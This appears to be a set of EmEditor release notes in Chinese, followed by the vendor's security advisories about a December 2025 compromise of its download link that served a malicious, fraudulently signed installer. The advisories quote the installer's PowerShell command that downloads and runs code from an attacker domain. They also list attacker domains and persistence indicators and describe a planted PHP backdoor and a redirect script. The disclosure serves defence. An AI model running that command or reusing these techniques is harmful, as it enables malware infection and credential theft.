• 修复了在 v26.0.0 中引入的一个问题：当对包含换行符的多重选择执行“替换”或“删除”时，可能会导致崩溃。
• 修复了在 v26.0.0 中引入的一个问题：某些操作（例如“查找”“替换”和筛选）可能不会被记录到宏中。
• 修复了在 v26.0.0 中引入的一个问题：标准“打开”对话框中的“文件类型”列表有时可能显示不正确。

如果你使用桌面安装程序（Desktop Installer）版本，请通过“帮助 > 检查更新”进行更新。如果无法更新，请下载最新版本并运行安装程序。我们预计 Microsoft Store 版本将在未来几天内发布。如果你直接下载 MSI，请确认其数字签名由 Emurasoft, Inc. 签署。

• 修复了 v26.0.0 中的回归问题：在某些情况下，对非常大的非 UTF‑8 文件进行搜索、替换或筛选时可能导致应用崩溃。
• 修复了在编辑包含代理对字符时可能发生的问题。
• 修复了 v26.0.0 中批处理查找/替换列表的回归问题：同时移动多个选中项向上或向下时无法正常工作。

如果您使用的是桌面安装程序版本，请在“帮助 > 检查更新”中进行更新。如果无法更新，请下载最新版本并运行安装程序。我们预计 Microsoft Store 版本将在未来几天内发布。如果您直接下载 MSI，请确认数字签名为 Emurasoft, Inc. 签署。

为了提升网页加载速度，开发者经常会对 JavaScript、CSS 和 HTML 进行“压缩（minify）”，也就是去掉换行和空格。同样地，像 XML 和 JSON 这样的数据格式也可能被压缩成单行，以便作为连续流更容易处理，即使这会损害可读性。有些科学数据甚至更极端——例如基因组序列（A、T、G、C）可以被存储为一条不断开的字符串，长度可达数十亿字符。这类文件正变得越来越常见，我们也经常听到用户反馈它们会让 EmEditor 变慢。由于这些文件包含异常长的单行内容，会对性能造成显著影响。在 v26.0 中，我们使用多线程和 SIMD 重新审查并优化了内部代码，我们的测试显示，与上一版本相比，打开/搜索/替换性能提升了 2.2× 到 666×。

EmEditor 从早期就支持 Unicode，但过去输入一些不易键入的字符——例如生僻汉字、外语字符或表情符号——并不方便。您必须打开 插入 > 特殊字符（Ctrl+Shift+I），输入代码值，插入字符，并在每次都重复这一流程。在 v26.0 中，我们将该对话框重新设计为一个可自定义的栏，可在工作时保持打开。它现在还支持按 Unicode 名称和 Unicode 区块搜索，用大字号易读字体显示结果，并可用彩色渲染支持彩色显示的字符（例如表情符号）。例如，搜索 “smiling” 会返回许多笑脸表情。

字符代码值对话框（Ctrl+I）也已更新，可用大号彩色字体显示字符，让复杂字符和表情符号更容易识别。

根据客户反馈，我们扩展了收藏夹功能。除了文件外，现在也可以将文件夹注册为收藏夹。选择某个文件夹会打开打开文件对话框，以便您选择想要的文件。我们还改进了拖放行为：当您从资源管理器拖入多个文件时，如果列表中已经存在同名文件（且未指定行/列），EmEditor 将不会重复添加。

用于 加粗、斜体 和 代码 的 Markdown 命令现在即使在未选中文本时也能生效。例如，当您在未选择任何内容的情况下执行 Markdown 加粗命令，然后开始输入时，您输入的文字将以加粗形式插入。

长期以来以非模态窗口提供的撤销/重做历史 对话框，现已转换为一个自定义栏。这样您就能更方便地把历史记录固定显示在合适的位置，同时继续编辑。

Makoto Emura 增强了他的与 AI 聊天和提交列表插件。在与 AI 聊天中，我们在输入框左侧新增了 “+ 文件” 按钮：如果您使用的是 OpenAI 模型，就可以将选中的文件上传到提示词中。这不仅让您比手动输入或粘贴更容易发送大量内容，还能附加诸如 HTML、PDF、Word 等受支持的文件。该功能使用了 OpenAI 的文件搜索功能。上传文件通常比将整个文件文本粘贴到聊天中消耗更少的令牌。我们还新增了在聊天历史（过往对话）中搜索的功能。请注意，AI 功能（包括与 AI 聊天）除了 EmEditor 之外，还需要安装单独的 ChatAI 插件。

在提交列表中，我们改进了多项操作的性能，包括显示变更列表和提交历史。

我们还修复了在预览版本中发现的问题。

我们希望 Pro 与 Free 版本都能符合您的期望。如果您有问题、功能需求或想法，请联系我们。

感谢您一直以来对 EmEditor 的支持。
— Yutaka Emura

如需查看包含主要变更与截图在内的详细信息，请参阅 Version 26.0 新增特性。

如果您使用的是桌面安装程序版本，请在“帮助 > 检查更新”中进行更新。如果无法更新，请下载最新版本并运行安装程序。我们预计 Microsoft Store 版本将在未来几天内发布。如果您直接下载 MSI，请确认数字签名为 Emurasoft, Inc. 签署。

EmEditor 桌面安装程序现也可通过 Microsoft Store 获取。
Microsoft Store 上提供的桌面安装程序，对 EmEditor Professional 和 EmEditor Free 均为同一个程序 （您将获得同一款应用，并根据您的许可证/使用方式来使用）。

我们还改进了我们的官方网站（www.emeditor.com），让您能更安心地下载 EmEditor。

• EmEditor 桌面安装程序 现可从 Microsoft Store 获取。
• 即使您无法使用 Microsoft Store，仍可从我们的官方网站安全下载 桌面安装程序 。
• 我们的网站已重建为基于静态 HTML 的站点，与动态网站相比，可降低网站被篡改等风险。
• 该网站现托管在 Cloudflare Workers 上，并采用严格的安全控制。Cloudflare 的基于角色的访问控制与企业级身份验证标准有助于确保只有授权更改才能进行，因此您可以信任所看到的内容确实来自我们。

我们将继续仅通过我们的网站及其他授权分发渠道提供官方安装程序 。
为确保您的安全，请从我们的官方网站或 Microsoft Store 等可信来源下载 EmEditor。

从 Microsoft Store 下载

其他下载

• 修复了当 CommitList 插件处理 Unicode 路径时可能发生的崩溃。
• 修复了存放在可移动驱动器上的便携版在产品注册方面可能受到影响的问题。
• 修复了在某些情况下“关于”对话框中显示的产品注册信息不正确的问题。
• 更新了用于 Microsoft 商店提交的 UI。

如果你使用的是桌面安装程序版本，请前往 帮助 → 检查更新 下载最新版本。如果无法更新——或你当前未安装 EmEditor——请下载安装程序并运行。

EmEditor（桌面安装程序）现也可从 Microsoft 商店获取：

从 Microsoft 商店下载桌面安装程序（推荐）

对于较早版本的 Windows，你可以直接在 此处 下载安装程序。

如果你直接下载 MSI 文件，请验证数字签名是否由 “Emurasoft, Inc.” 签署：

1. 右键单击已下载的文件并选择 属性。
2. 打开 数字签名 选项卡。
3. 确认签名者为 Emurasoft, Inc.。
4. 除非签名者为 Emurasoft, Inc.，否则在任何情况下都不要安装该文件。

EmEditor 的更新检查器会自动验证 MSI 的签名者；如果签名者不是 Emurasoft, Inc.，将取消更新。

或者，你也可以验证 SHA-256 哈希值：

• emed64_25.4.5.msi: 0035f22bc12f565e9fe904eabccd24a608903b4d76e8bda2ec758bfcd18b12e9
• emed64_25.4.5_portable.zip: 3e2e56fd146aff6324896893265a943058cf50905acb5130d14be12464bca5ea
• chatai64_25.4.5.msi: f9601e5ec55033aa7bcd0cdcd24e92f6db24321948c15e798605e4781d170c27
• chatai64_25.4.5_portable: 7e662f206947ea29289d3d755753190073d76b3f051dd6e1210224849441d3e5
• emed_help_en_25.4.5.msi: 2ed200c42b210d4dbabb9050094f059d4de9b9c5cebb8260b5b9f35591c74990
• emed_help_ja_25.4.5.msi: 4bc21dbe4a5906c6f3a513fa0b049cf9ad953889c58b61f6018a8133a1fc3207
• emed_help_zh-cn_25.4.5.msi: 4c0854c141be7f9ddd70528303cee4d470a97eb10e40e6e3e59afe7d2d3fa12a
• emed_help_zh-tw_25.4.5.msi: 877cd8192c2b6c4c676d7a31a3953daeb4e41adc0497c4fc565d26e333e28e22

如果你使用桌面便携版，请访问下载页面获取最新版本。商店应用版本将在几天后可通过 Microsoft 商店更新。

• 更新了某些状态栏项目，使其仅在双击时才会激活，从而有助于防止误操作。
• 修复了当相关开关关闭时，状态栏工具提示（只读模式及其他指示）并不总是显示的问题。
• 修复了在大型 HTML 文件中高亮匹配标签可能不可靠的情况。
• 更正了将包含 NUL（NULL）字符的文件作为文本文件打开时的行为。
• 修复了在某些条件下在文件中替换可能导致崩溃的问题。
• 修复了影响某项同步功能的问题。
• 允许在启用筛选时仍可显示大纲栏。
• 修复了在使用无效的数字范围语法进行筛选时可能导致崩溃的问题。
• 修复了在某些条件下注册信息/关于对话框中可能显示错误信息的问题。
• 修复了在自定义对话框的 AI 提示页面中选择复制时的行为问题。
• 修复了当 Windows 显示语言设置为不受支持的语言时，UI 可能切换为中文（而不是英语）的问题。

如果您使用的是桌面安装程序版本，请前往帮助 → 检查更新，下载最新版本。如果该方法无效，请下载安装程序（emed64_25.4.4.msi） 并运行。

如果您直接下载 MSI 文件，请验证其数字签名是否由 “Emurasoft, Inc.” 签署：

1. 右键单击已下载的文件并选择属性。
2. 打开数字签名选项卡。
3. 确认签名者为 Emurasoft, Inc.
4. 除非签名者为 Emurasoft, Inc.，否则在任何情况下都不要安装该文件。

EmEditor 的更新检查器会自动验证 MSI 的签名者；如果签名者不是 Emurasoft, Inc.，将取消更新。

另外，您也可以使用以下 SHA-256 哈希值进行校验：

• emed64_25.4.4.msi: 09e884896467b8fa574b2adf22d792e039774b8fb1300ec26a59c951937eaa3c
• chatai64_25.4.4.msi: f4db8fe290d3d5d44bd08461da24f168a73b085c6d589687f41b0a9a820556e8

如果您使用桌面便携版，请访问下载页面获取最新版本。商店应用版本可在数日后通过 Microsoft 商店更新。

我们再次就本次事件造成的严重担忧与不便，向大家致以诚挚的歉意。

1. 可能受影响的时间范围（美国太平洋时间 / UTC）

在之前的通知中，我们提供了美国太平洋时间的范围。为便于参考，这里也同时给出协调世界时（UTC）。

• 2025 年 12 月 19 日 18:39 – 2025 年 12 月 22 日 12:50（美国太平洋时间）
• 2025-12-20 02:39 – 2025-12-22 20:50（UTC）

如果您在上述期间通过 EmEditor 网站的下载路径（例如点击“Download Now”按钮）下载了安装程序，则有可能下载到的文件并非由我们（Emurasoft, Inc.）提供的合法安装程序。

请注意：出于极度谨慎，我们将上述时间范围刻意设置得较宽。实际受影响的窗口可能更短，且仅发生在特定时间段。

2. 关于可疑文件（已确认的差异）

针对文件 emed64_25.4.3.msi，我们已确认至少存在 两个可疑文件。

我们还确认这两个可疑文件均带有 微软签发的数字签名。由于其有效期极短（仅数天），我们认为这些证书很可能是以类似面向开发者的方式签发的。

我们已将该事件报告给微软，提交了可疑文件并请求吊销相关签名。目前我们已确认 两个签名均已被吊销。因此，尝试运行该 MSI 时应会显示签名无效的警告，使安装变得困难。

合法文件（EmEditor 官方安装程序）

• 文件名：emed64_25.4.3.msi
• 大小：80,376,832 字节
• 数字签名 — Subject（主体）：Emurasoft, Inc.
• 数字签名 — Issuer（颁发者）：Sectigo Public Code Signing CA R36
• 数字签名 — 有效期：2023 年 4 月 9 日至 2026 年 4 月 9 日
• SHA-256：e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
• VirusTotal：https://www.virustotal.com/gui/file/e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
• 官方分发来源：https://download.emeditor.info/emed64_25.4.3.msi

问题文件 #1

• 文件名：emed64_25.4.3.msi
• 大小：80,380,416 字节
• 数字签名 — Subject（主体）：WALSHAM INVESTMENTS LIMITED
• 数字签名 — Issuer（颁发者）：Microsoft ID Verified CS EOC CA 02
• 数字签名 — 有效期：2025 年 12 月 21 日至 2025 年 12 月 24 日
• SHA-256：4bea333d3d2f2a32018cd6afe742c3b25bfcc6bfe8963179dad3940305b13c98
• VirusTotal：https://www.virustotal.com/gui/file/4bea333d3d2f2a32018cd6afe742c3b25bfcc6bfe8963179dad3940305b13c98

问题文件 #2

• 文件名：emed64_25.4.3.msi
• 大小：80,380,416 字节
• 数字签名 — Subject（主体）：WALSHAM INVESTMENTS LIMITED
• 数字签名 — Issuer（颁发者）：Microsoft ID Verified CS EOC CA 01
• 数字签名 — 有效期：2025 年 12 月 20 日至 2025 年 12 月 23 日
• SHA-256：3d1763b037e66bbde222125a21b23fc24abd76ebab40589748ac69e2f37c27fc
• VirusTotal：https://www.virustotal.com/gui/file/3d1763b037e66bbde222125a21b23fc24abd76ebab40589748ac69e2f37c27fc

3. 如果您已经删除了下载的文件

如果您仍保留下载的文件（emed64_25.4.3.msi），则可按（先前公告中的方法）通过检查数字签名和/或 SHA-256 来验证其真伪。

即便您已删除该文件，Windows 也可能在安装过程中将 MSI 的副本保存在 C:\Windows\Installer 目录下，并以不同名称存储。

由于该目录既隐藏又受系统保护，使用资源管理器常规浏览可能较难找到。请直接在地址栏输入并打开：C:\Windows\Installer。

打开后，我们建议按以下步骤操作。请务必小心，不要双击或运行任何 MSI 文件。

1. 按日期排序（例如“修改日期”）
2. 重点关注近期文件
3. 检查目标文件的数字签名（右键 → 属性 → 数字签名）

4. 如何检查您的计算机是否可能已感染

即便执行了可疑文件，在以下环境中也不一定会感染，例如：

• 设备处于离线状态
• 需要 VPN/代理才能联网
• Windows 功能或策略阻止了可疑 PowerShell 行为
• PowerShell 执行受到限制
• 杀毒/安全软件阻止了相关活动

但如果以下任意一项成立，则感染可能性会非常高：

• 存在 C:\ProgramData\tmp_mojo.log
• 存在名为 Google Drive Caching 的计划任务
• 在 %LOCALAPPDATA%\Google Drive Caching\ 下存在 background.vbs
• 在 Chrome 或 Microsoft Edge 等 Chromium 内核浏览器中存在名为 Google Drive Caching 的浏览器扩展（即使其声称由 Google 制作）——尤其是当其具备“读取和更改所有网站的数据”以及剪贴板访问权限时
• 网络日志显示连接到以下任一域名：
• cachingdrive.com
• emeditorde.com
• emeditorgb.com
• emeditorjp.com
• emeditorsb.com

若以上均不适用，则风险较低——但并非为零——因为攻击的一部分可能在内存中运行，几乎不留下文件层面的证据。

5. 已确认的行为（目标域名等）

如先前公告所述，我们已确认可疑安装程序在执行后会从外部域名下载其他文件并执行。

此前我们确认其访问了 emeditorjp.com；后续调查还发现其额外访问了 emeditorde.com、emeditorgb.com、emeditorsb.com。

上述四个域名（emeditorjp.com、emeditorde.com、emeditorgb.com、emeditorsb.com）均非由我们（Emurasoft, Inc.）运营。

我们也确认了先前通知中描述的 PowerShell 命令会从外部域名下载并执行文件，这种行为可能导致恶意软件感染，并造成密码等个人信息被窃取。

更多细节请参阅由 Luca Palermo 先生与 Mario Ciccarelli 先生撰写的研究报告。Palermo 先生向我们提供了该报告并授权我们发布，在此对他们的协助表示诚挚感谢。

• [恶意软件分析报告——多阶段信息窃取器（作者：Luca Palermo 与 Mario Ciccarelli）]()

6. 为什么这次“难以察觉”

从基本事实来看，在特定条件下，第三方确实可能获取域名与数字签名。

• 如果域名未被使用或未续费，往往可以以较低成本购买。
• 代码签名证书通常可以从许多证书颁发机构获取（本案中颁发者为微软）。
• 一旦发现问题，主要可采取的措施是联系颁发者/认证机构并请求吊销。

从技术角度看，MSI 安装包可以通过自定义操作包含任意脚本（包括 PowerShell）。具备足够知识的攻击者可以在一个外观极其接近、且分发广泛的合法安装包中注入恶意加载器。

即便安装包是 EXE 而非 MSI，也依然可能发生类似攻击。

遗憾的是，这意味着软件公司很难从根本上阻止“高度仿冒的恶意安装程序”被创建并传播。我们必须假设未来仍可能出现类似复杂的、多阶段的恶意安装程序。

尽管如此，我们认为本次事件的核心问题可概括为：

1. 我们网站上用于便捷下载的重定向（下载路径）在未被发现的情况下被篡改。
2. 外部人员在我们网站上放置了恶意安装程序。

由于两者同时发生，导致客户从我们官方网站下载后遭受伤害，我们对此承担全部责任，并会将其反映在未来的防范措施中。

6-1. 放置在 EmEditor 网站上的恶意文件

除恶意安装程序 emed64_25.4.3.msi 外，我们还在某插件目录下发现了名为 base64.php 的文件。对 base64.php 分析后，我们判定其为典型后门（远程代码执行 / RCE）。

我们还发现 WordPress 主题目录中的 footer.php 被添加了脚本。该脚本劫持了原本指向合法 URL 的点击：

• https://support.emeditor.com/ja/downloads/latest/installer/64

并将其重定向到：

• https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

因此，点击首页的“Download Now”按钮可能会下载到恶意文件。

更为恶意的是，该脚本被配置为仅对未登录访客触发，使管理员难以复现与发现问题。因此，即使我们自己检查网站时，也未能立即察觉重定向已被篡改。

7. 原因（当前评估）

我们仍在调查中，尚未得出最终结论。但我们正在考虑以下可能性：

WordPress 由多个组件构成——核心、插件、主题等——由许多开发者维护。这些组件会不断被发现漏洞，并陆续发布更新。

我们会定期更新插件与主题，但在某些情况下，漏洞可能长期未被修复。攻击可能利用了此类漏洞。

也有可能使用中的 SFTP 账号成为攻击目标。

8. 我们的应对（已完成 / 计划中）

我们已立即删除恶意文件 emed64_25.4.3.msi。同时检查文件修改日志，确认新增了 base64.php 并对 footer.php 做了更改。在将 base64.php 确认为后门后，我们对全站进行了扫描。

随后我们重建了网站，重新安装所有插件，并移除不必要的插件。我们也扫描了内部电脑，并更改了所有 WordPress 站点及相关服务的登录密码。我们通过日志审查对所使用的若干服务进行了审计。

此外，我们停止在“Download Now”等下载按钮中使用重定向，改为直接链接到已验证安全的文件。我们还更新了下载页面，明确展示 MSI 的 SHA-256，并加入提示以鼓励用户验证数字签名。

为进一步强化 EmEditor 首页下载路径，我们也在考虑近期将网站从 WordPress 迁移为自定义/静态网站。

9. 结语

如上所述，被篡改的安装程序在执行后可能进行极其危险的操作。同时，我们也无法从根本上阻止第三方创建并分发仿冒合法安装程序的恶意版本。

因此，我们最优先的目标是确保任何人都无法通过我们的网站获取恶意软件，因为网站是我们的主要分发渠道。

本次事件也提醒我们：尽管 Xoops、WordPress 等流行 CMS 平台使用方便，但其可扩展性会增加暴露于漏洞的风险；而仅仅保持插件与主题更新，并不能完全消除风险。

值得庆幸的是，Emurasoft Customer Center 并未被攻破，我们的数据库也保持安全。我们没有发现任何人访问了客户数据库的证据。

我们希望本次事件的经验能对其他软件公司有所帮助，因此尽可能提供了更多细节与背景，而不仅限于简短报告。

我们再次就造成的担忧与不便致以诚挚歉意，并特别向因感染相关问题而遭受损害的用户致歉。

感谢您一直以来对 EmEditor 的支持。

我们非常遗憾地通知您：我们已确认 EmEditor 官方网站的下载路径（[Download Now] 按钮）发生了一起事件，疑似遭到第三方未授权篡改。在受影响期间，通过该按钮下载的安装程序可能并非我们（Emurasoft, Inc.）提供的正版文件。

对此可能造成的担忧与不便，我们深表歉意。请阅读以下信息。

1. 可能受影响的期间

• 2025 年 12 月 19 日 18:39 – 2025 年 12 月 22 日 12:50（美国太平洋时间）

如果您在上述期间通过 EmEditor 首页的 [Download Now] 按钮下载安装程序，则有可能下载到了一个没有我们数字签名的不同文件。这是保守估计；实际受影响时间可能更短，并且可能仅限于某一特定时间段。

2. 事件概要（深层原因）

[Download Now] 按钮正常情况下指向以下 URL：

• https://support.emeditor.com/en/downloads/latest/installer/64

该 URL 使用了重定向。然而在受影响期间，重定向设置疑似被第三方更改，导致下载被从以下（错误）URL 提供：

• https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

该文件并非由 Emurasoft, Inc. 创建，并且已被移除。

因此我们确认，下载到的文件数字签名可能不是我们，而是来自另一家名为 WALSHAM INVESTMENTS LIMITED 的组织。

注：此问题可能不限于英文页面，也可能影响其他语言的类似 URL（包括日文）。

3. 已确认可能受影响的文件

目前唯一确认涉及的文件为：

• emed64_25.4.3.msi

正版文件（官方）

• 文件名：emed64_25.4.3.msi
• 大小：80,376,832 字节
• 数字签名：Emurasoft, Inc.
• SHA-256：e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

可疑文件（可能被篡改）

• 文件名：emed64_25.4.3.msi
• 大小：80,380,416 字节
• 数字签名：WALSHAM INVESTMENTS LIMITED

4. 不受影响的情况

如果符合以下任一情况，则您不受影响：

• 通过 EmEditor 的 更新检查器（Update Checker） 或自动更新进行更新
• 直接从 download.emeditor.info 下载
  示例：https://download.emeditor.info/emed64_25.4.3.msi
• 下载的不是 emed64_25.4.3.msi 文件
• 使用了 便携版（portable version）
• 使用了 商店应用版本（store app version）
• 使用 winget 安装/更新
• 下载了文件但没有运行/执行

5. 如何检查以及应采取的措施

如果您可能在受影响期间通过 [Download Now] 下载了安装程序，请验证 emed64_25.4.3.msi 文件的数字签名与 SHA-256 哈希。

5-1. 如何检查数字签名（Windows）

1. 右键点击文件（emed64_25.4.3.msi），选择 属性（Properties）。
2. 打开 数字签名（Digital Signatures） 选项卡。
3. 确认签名者为 Emurasoft, Inc.

• 若显示 WALSHAM INVESTMENTS LIMITED，则该文件可能为恶意文件。

如果未显示“数字签名”选项卡，可能表示该文件未签名或签名无法识别。此时请勿运行该文件；删除并按下方指引处理。

5-2. 如何检查 SHA-256（Windows / PowerShell）

打开 PowerShell 并执行：

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

确认输出的 SHA-256 与下列一致：

• 正版 SHA-256：e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

如果签名或 SHA-256 不匹配（建议措施）

如果数字签名不是 Emurasoft, Inc.（例如为 WALSHAM INVESTMENTS LIMITED）或 SHA-256 不匹配，则您可能获取了被篡改的文件（可能包含恶意软件）。

• 立即将受影响电脑断开网络连接（有线/无线）
• 对系统执行一次完整的恶意软件扫描
• 视情况考虑刷新/重建包括操作系统在内的环境
• 考虑凭据可能泄露：对该设备上使用/保存过的账号更改密码（并尽可能启用 MFA 多因素认证）

如果您在组织内使用 EmEditor，也建议联系内部安全团队（如 CSIRT），并尽可能保留相关日志。

6. 已观察到的行为（截至目前确认）

该可疑安装程序在执行时可能尝试运行以下命令。在任何情况下都不要运行该命令。

• powershell.exe "irm emeditorjp.com | iex"

该命令会从 emeditorjp.com 下载并执行内容。
emeditorjp.com 并非 Emurasoft, Inc. 管理的域名。

另请注意：该安装程序可能仍会正常安装 EmEditor 并安装正版的 EmEditor 程序文件，这会使问题更难被察觉。

7. 当前状态与后续更新

我们将继续调查事实并确定影响范围。一旦有更多信息，我们会在本页面和/或通过官方渠道尽快更新。
我们高度重视此次事件，并将采取必要措施查明原因、避免再次发生。

对于此次事件可能造成的不便与担忧，我们再次致以诚挚歉意，并感谢您对 EmEditor 的理解与持续支持。

• 修复了在“与 AI 聊天”中“使用 OPENAI_API_KEY 环境变量”选项以及“复制到新文档”命令可能无法正常工作的问题（需要 ChatAI 插件）。
• 修复了可能导致状态栏部分内容被截断的错误。
• 修正了字符代码值命令在 ASCII（二进制）视图中显示 NUL 字符代码的方式。
• 提升了多个方面的性能，包括使包含很长行的文档中的水平滚动更加流畅。
• 阻止在启用使用编辑器字体时清除查找/替换搜索历史记录。
• 已解决用户报告的问题（1）。

如果您使用桌面安装版本，可以在帮助中选择检查更新以下载最新版本。如果此方法失败，请下载最新版本，并运行下载的安装程序。 如果您使用桌面便携版本，可以访问下载页面以下载最新版本。商店应用版本可以在几天后通过 Microsoft 商店更新。